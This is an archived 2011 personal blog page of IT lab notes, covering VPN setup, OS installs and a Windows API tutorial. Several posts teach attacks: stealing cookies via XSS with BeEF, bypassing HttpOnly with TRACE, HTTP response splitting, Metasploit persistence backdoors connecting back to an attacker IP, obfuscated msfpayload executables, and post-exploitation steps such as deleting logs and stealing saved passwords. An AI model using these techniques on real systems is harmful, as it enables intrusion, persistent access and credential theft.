Posts

Showing posts from 2011

Microsoft CA lab

Image
Microsoft windows CA lab: CA Workgroup: CA Domain: Raise DC: CA: SSL: Network Monitor: ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

5 step to create Window with windows API use C

Image
5 steps: 1. Initialzate class 2. Resgister class 3. Create window 4. Receive message from WinProc 5. Translate message and dispatch it Step 1: Initialzate class I like way http://www.winprog.org/tutorial/simple_window.html use: const char g_szClassName[] = "myWindowClass"; Step 2: Registering the Window Class In WinMain() function: WNDCLASSEX wc; wc.cbSize        = sizeof(WNDCLASSEX); wc.style         = 0; wc.lpfnWndProc   = WndProc; wc.cbClsExtra    = 0; wc.cbWndExtra    = 0; wc.hInstance     = hInstance; wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION); wc.hCursor       = LoadCursor(NULL, IDC_ARROW); wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); wc.lpszMenuName  = NULL; wc.lpszClassName = g_szClassName; wc.hIconSm       = LoadIcon(NULL, IDI_APPLICATION); if(!RegisterClassEx(&wc)) {     MessageBox(NULL, "Window Registration Failed!", "Error!",     MB_ICONEXCLAMATION | MB_OK);     return 0; } Step 3: Creating the

Checkpoint Policy

Image
Public http and ftp: Proventia through Checkpoint: Server sensor through checkpoint: ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Install Solaris

Image
Thanks to thuynguyenkim record and edit video :)) ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Checkpoint VPN

Image
VPN client to site: SmartConsole config: Client config and test: VPN site to site: VPN HN: VPN HCM and test: ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more. 

XSS beef framework

Image
XSS are executed on the client-side. You can use javascript, DOM to steal data, cookie, deface.... I tried many times with javascript, but i found beef, XSS framework. One work: include script and send malicous code to victim: If XSS in POST request, you can create page, it will generate POST request: MF: http://www.mediafire.com/?832ps4haqqg3989 ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.    

TRACE method with XST

TRACE method. Today, i will presente one solution. TRACE method. We known many HTTP reports: GET POST OPTION... But we will focus one method: TRACE. If we use it, it will give copy of our request: icesurfer@nightblade ~ $ nc www.victim.com 80 TRACE / HTTP/1.1 Host: www.victim.com HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:01:48 GMT Connection: close Content-Type: message/http Content-Length: 39 TRACE / HTTP/1.1 Host: www.victim.com Now, i am goting to talk about: httponly. It is one mechanism to protect cookie. HttpOnly is an additional flag included in a Set-Cookie HTTP response header. f the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script. So, we can use it to prevent XSS attack. But if server support TRACE method, we will east bypass it. Now, we must review before example. TRACE method will give me all all request, that mean we will access cookie, which was tagged

HTTP cache poisioning

HTTP response spilitting First, we watch one source code: $ cat redir.php header ("Location: " . $_GET['page']); ?> "page" argument will be got from end-user and redirect (302) to another page. Ex: redir.php?page=index.php redir.php?page=test.html Now, we will talk about http request. In normally, if you request redir.php?page=test.html, http request like that: GET http://localhost/redir.php?site=test.html Host: localhost User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 We will go to test.html. Notice to "page" variable. It is not filtered. So end-user can modify it. Using CR (%0d) and LF (%0a), attacker can control http request, generate two response to one request. How to do that? this is page variable: ?page=test.html The resulting answer from the vulnerable application: HT

Install windows 3.1

Image
First OS i had beend used :)). ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Metasploit Backdoor Tutorial

Image
Backdoor: Create persistence backdoor Can be configured to connect back on systemboot or user login Time can be set between connect back attemps Under the hood     Create vbs file on the victim and excute it     Add registry entries so it is autorun Can be uninstalled remotely     Vbs file delete manually meterpreter > run persistence meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10 Metsvc backdoor Run as service on the victim Connect to it remotely     No authentication required Can be remotely unintalled     File need delete manually Less noisy compared to persistence     Attacker can connect when he wants Can be found by portscaning Demo: Backdoor with Metsvc Create Executable from payloads Msfpayload Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar; Ex: msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe Encoding to obfucate payload Encode payload to e

Endian- VPN client to site (Host to network)

Image
One friend ask me about it. I recognize many company in Vietnam like using Endian. But flow me, i like Vyatta more, because i like denial using routing. :)) That is simple to config it, if you had some experience about openvpn. Endian use openvpn for vpnserver. And you will notice about client config, there are: dev tap : for DHCP service ca endian.pem : ca cert, not use client cert like ipcop remote endian IP or hostname : of coure auth-user-pass : user and password which were created. Demo: or: http://www.mediafire.com/?2qdhttek586be81 ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Metasploit, stealing data, get saved password and sniffing password

Image
My friend asked me: what will you do after exploit. So i answered: privilege escalation, or stealing data. I have some advices for : Phases of Post-exploitation 1. Understanding the Victim better 2. Privilege Escalation 3. Deleting Log and Kill Monitoring software 4. Collecting Data, excuting Programs     Search for a file     Download files     Download resgistry     Download application data         Outlook         Browser password/sessions         ...etc 5. Backdoors and Rootkits 6. Using victim as Pirvot to hack deeper into the network  I maded one video demo it: Using metasploit to stealing data and get firefox saved password: <p><p><p> </p></p>&

Install l7-filter module for Iptables

Preparing: To use menuconfig: yum install -y ncurses-devel Download required packages Download L7-filter kernel wget http://downloads.sourceforge.net/l7-filter/netfilter-layer7-v2.19.tar.gz Download L7-filter Protocol definitions wget http://sourceforge.net/projects/l7-filter/files/Protocol definitions/2009-05-28/l7-protocols-2009-05-28.tar.gz Download Linux Iptables 1.4.0 wget http://www.netfilter.org/projects/iptables/files/iptables-1.4.0.tar.bz2 Download Linux Kernel 2.6.26 wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.26.tar.bz2 Extract it: tar xvf linux-2.6.26.tar.bz2 tar xvf netfilter-layer7-v2.19.tar.gz Apply patch to Linux kernel source cd linux-2.6.26 patch -p1 < ../netfilter-layer7-v2.19/kernel-2.6.25-layer7-2.19.patch Apply patch & install iptables 1.4.0 tar -xvf iptables-1.4.0.tar.bz2 cd iptables-1.4.0 patch -p1 < ../netfilter-layer7-v2.19/iptables-1.4-for-kernel-2.6.20forward-layer7-2.19.patch chmod +x extensions/.laye

OpenCA tutorial

Image
Install OpenCA tutorial #yum install -y openssl-devel db4 db4-devel mysql-server mysql-devel perl-XML-Parser httpd # rpm -Uvh openca-tools-1.3.0-1.el5.i386.rpm # tar xvf openca-base-1.1.1.tar.gz # cd openca-base-1.1.1 # mysql -u root -p Enter password: Welcome to the MySQL monitor.  Commands end with ; or \g. Your MySQL connection id is 7 Server version: 5.0.77 Source distribution Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> create database openca; Query OK, 1 row affected (0.00 sec) mysql> GRANT ALL PRIVILEGES ON *.* TO 'openca'@'localhost' IDENTIFIED BY '123456'; Query OK, 0 rows affected (0.00 sec) # mysql -u openca -p ./configure --prefix=/opt/openca \                  --with-ca-organization="HBN CA Labs" \                  --with-httpd-fs-prefix=/var/www \                  --with-httpd-main-dir=pki \                  --with-db-name=openca \                  --with-db

Install Solaris 10 - Tutorial by images

Image
One note: Set Vmware at least 580mb of Ram. 539 mb if you install in text mode, 780 if you use graphic mode. ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.  

Install Redhat Enterprise - Graphic mode

Image
Many people very hard to start learning Linux. In the past, i spent 1 year but can not install Linux :)). So I write detail tutorial by images to help any people who need it. First, you must have Redhat ISO. You can burn it to CD or USB stick. Then, config BIOS to boot it. After that, you can start install. It is boot windows: Enter to start ( Graphic mode) If you type text, you will use text mode Skip to ingnore test CD Start Graphic mode Chose Language: English Chose keyboard: English    Type your serial number:     ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.